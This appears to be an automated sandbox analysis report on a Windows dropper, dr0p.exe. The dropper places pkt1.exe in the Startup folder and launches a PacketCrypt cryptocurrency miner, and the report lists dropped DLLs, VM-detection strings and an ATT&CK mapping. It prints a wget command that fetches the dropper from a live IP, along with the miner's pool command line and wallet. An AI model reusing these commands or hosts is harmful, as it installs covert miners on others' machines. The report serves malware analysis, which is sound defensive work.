Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Linq.Queryable.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Reflection.Metadata.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.Tools.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.WebSockets.Client.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.Overlapped.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Reflection.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Xml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Cryptography.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Cryptography.Csp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Xml.Serialization.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Cryptography.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Windows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Text.Encodings.Web.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Memory.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\netstandard.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.Compression.FileSystem.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Numerics.Vectors.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Xml.XDocument.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Linq.Parallel.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Text.Json.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Intrinsics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Private.DataContractSerialization.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Dynamic.Runtime.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.FileSystem.Watcher.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.MemoryMappedFiles.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\PacketCryptApp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.Tasks.Parallel.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Principal.Windows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Resources.ResourceManager.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Handles.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ComponentModel.DataAnnotations.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Serialization.Formatters.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.CSharp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.Tasks.Dataflow.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Reflection.Emit.Lightweight.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.Thread.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Reflection.TypeExtensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Cryptography.Algorithms.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.Win32.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Web.HttpUtility.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.Immutable.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.FileSystem.Primitives.dll	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

API coverage: 0.0 %

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\download\dr0p.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior

Source: dr0p.exe, 00000004.00000002.2356498947.0000000005B22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Ri=
Source: dr0p.exe, 00000004.00000002.2356498947.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, dr0p.exe, 00000004.00000002.2356498947.0000000005B22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: dr0p.exe, 00000004.00000002.2356498947.0000000005B41000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: od_VMware_SA
Source: wget.exe, 00000002.00000002.1995575922.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3220492257.000002451C5C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\download\dr0p.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Process created: C:\Users\user\AppData\Local\Temp\packetcrypt.exe "C:\Users\user\AppData\Local\Temp\packetcrypt.exe" ann -p pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a http://pool.pkt.world			Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "http://23.27.51.244/dr0p.exe" > cmdline.out 2>&1

Source: C:\Windows\SysWOW64\wget.exe

Queries volume information: C:\Users\user\Desktop\download VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

Code function: 6_2_00007FF6471A03BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

6_2_00007FF6471A03BC

Remote Access Functionality

Found API chain with Download & Execute functionality

Source: C:\Users\user\Desktop\download\dr0p.exe

Download & Execute: InternetReadFile,WriteFile,ShellExecute

graph_4-33

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Command and Scripting Interpreter	1 Browser Extensions	11 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	Data from Local System	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	12 Registry Run Keys / Startup Folder	12 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	12 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
http://23.27.51.244/dr0p.exe	0%	Avira URL Cloud	safe

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\PacketCryptApp.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.CSharp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.VisualBasic.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.VisualBasic.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.Win32.Primitives.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.Win32.Registry.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\PacketCryptApp.dll	18%	ReversingLabs	Win64.Trojan.Generic
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.AppContext.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Buffers.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.Concurrent.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.Immutable.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.NonGeneric.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.Specialized.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ComponentModel.Annotations.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ComponentModel.DataAnnotations.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ComponentModel.EventBasedAsync.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ComponentModel.Primitives.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ComponentModel.TypeConverter.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ComponentModel.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Configuration.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Console.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Data.Common.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Data.DataSetExtensions.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Data.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.Contracts.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.Debug.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.DiagnosticSource.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.FileVersionInfo.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.Process.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.StackTrace.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.TextWriterTraceListener.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.Tools.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.TraceSource.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.Tracing.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Drawing.Primitives.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Drawing.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Dynamic.Runtime.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Formats.Asn1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Formats.Tar.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Globalization.Calendars.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Globalization.Extensions.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Globalization.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.Compression.Brotli.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.Compression.FileSystem.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.Compression.ZipFile.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.Compression.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.FileSystem.AccessControl.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.FileSystem.DriveInfo.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.FileSystem.Primitives.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.FileSystem.Watcher.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.FileSystem.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.IsolatedStorage.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.MemoryMappedFiles.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.Pipes.AccessControl.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.Pipes.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.UnmanagedMemoryStream.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Linq.Expressions.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Linq.Parallel.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Linq.Queryable.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://23.27.51.244/pkt1.exe	0%	Avira URL Cloud	safe
http://23.27.51.244/dr0p.exe64	0%	Avira URL Cloud	safe
http://23.27.51.244/pkt1.exe%	0%	Avira URL Cloud	safe
http://pool.pkt.world/blk/submitn4	0%	Avira URL Cloud	safe
http://master.pkt.world/pay5J	0%	Avira URL Cloud	safe
http://master.pkt.world/payRK	0%	Avira URL Cloud	safe
http://pool.pkt.worldem	0%	Avira URL Cloud	safe
http://pool.pkt.world/blk/submit	0%	Avira URL Cloud	safe
http://pool.pkt.world/config.jsonpkt.worN	0%	Avira URL Cloud	safe
http://pool.pkt.	0%	Avira URL Cloud	safe
http://pool.pkt.world/master0J	0%	Avira URL Cloud	safe
http://23.2	0%	Avira URL Cloud	safe
http://pool.pkt.world/config.json	0%	Avira URL Cloud	safe
http://pool.pkt.world/master/blkinfo_4087dcaf89d1ca4fef66e3d92de41a60caae8f691d440ea9391937078046b3f	0%	Avira URL Cloud	safe
http://pool.pkt.world/blk/submit?J	0%	Avira URL Cloud	safe
http://pool.pkt.world=C:HOMEPATH	0%	Avira URL Cloud	safe
http://pool.pkt.world/config.json#T4	0%	Avira URL Cloud	safe
http://pool.pkt.worlds	0%	Avira URL Cloud	safe
http://pool.pkt.world/config.jsonf	0%	Avira URL Cloud	safe
http://pool.p	0%	Avira URL Cloud	safe
http://pool.pkt.world/masterNum	0%	Avira URL Cloud	safe
http://pool.pkt.world/master.json	0%	Avira URL Cloud	safe
http://pool.pkt.world/masterT	0%	Avira URL Cloud	safe
http://pool.pkt.world/master	0%	Avira URL Cloud	safe
http://pool.pkt.world/config.json2ldgukth5a	0%	Avira URL Cloud	safe
http://pool.pkt.world	0%	Avira URL Cloud	safe
http://pool.pkt.world/blk/submitnl	0%	Avira URL Cloud	safe
http://master.pkt.world/paya	0%	Avira URL Cloud	safe
http://master.pkt.world/pay(J#	0%	Avira URL Cloud	safe
http://any.ah.pkt.world/anns/submit?cookie=913d38187b501dda5b38d1278781cb52f1c59d67b33093931b60ad556	0%	Avira URL Cloud	safe
http://pool.pkt.world/blk/submitn	0%	Avira URL Cloud	safe
http://master.pkt.world/payl	0%	Avira URL Cloud	safe
http://pool.pkt.worldG	0%	Avira URL Cloud	safe
http://any.ah.pkt.world	0%	Avira URL Cloud	safe
http://pool.pkt.world/masteraK	0%	Avira URL Cloud	safe
http://master.pkt.world/pay	0%	Avira URL Cloud	safe
http://23.27.51.244/dr0p.exem	0%	Avira URL Cloud	safe
http://pool.pkt.worldC:	0%	Avira URL Cloud	safe
http://pool.pkt.world/masterG	0%	Avira URL Cloud	safe
http://23.27.51.244/dr0p.exel	0%	Avira URL Cloud	safe
http://pool.pkt.world/masterN	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pool.pkt.world	151.80.239.86	true	false		unknown
any.ah.pkt.world	23.147.168.68	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://23.27.51.244/pkt1.exe	true	Avira URL Cloud: safe	unknown
http://23.27.51.244/dr0p.exe	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://23.27.51.244/dr0p.exe64	wget.exe, 00000002.00000002.1995534130.0000000000B10000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://html4/loose.dtd	pkt1.exe, 00000006.00000002.3224591101.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp	false		high
http://pool.pkt.world/blk/submitn4	packetcrypt.exe, 00000008.00000002.3223583370.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/config.jsonpkt.worN	packetcrypt.exe, 00000008.00000003.3163198339.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.worldem	packetcrypt.exe, 00000008.00000002.3220847412.000002451C900000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/blk/submit	packetcrypt.exe, 00000008.00000003.2869330836.000002451C642000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3223583370.000002451F2CE000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959536694.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3032136181.000002451F1B1000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749016108.000002451F20C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/dotnet/info	pkt1.exe, 00000006.00000002.3224591101.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp	false		high
http://23.27.51.244/pkt1.exe%	dr0p.exe, 00000004.00000002.2356498947.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://master.pkt.world/payRK	packetcrypt.exe, 00000008.00000003.2629587306.000002451F21D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
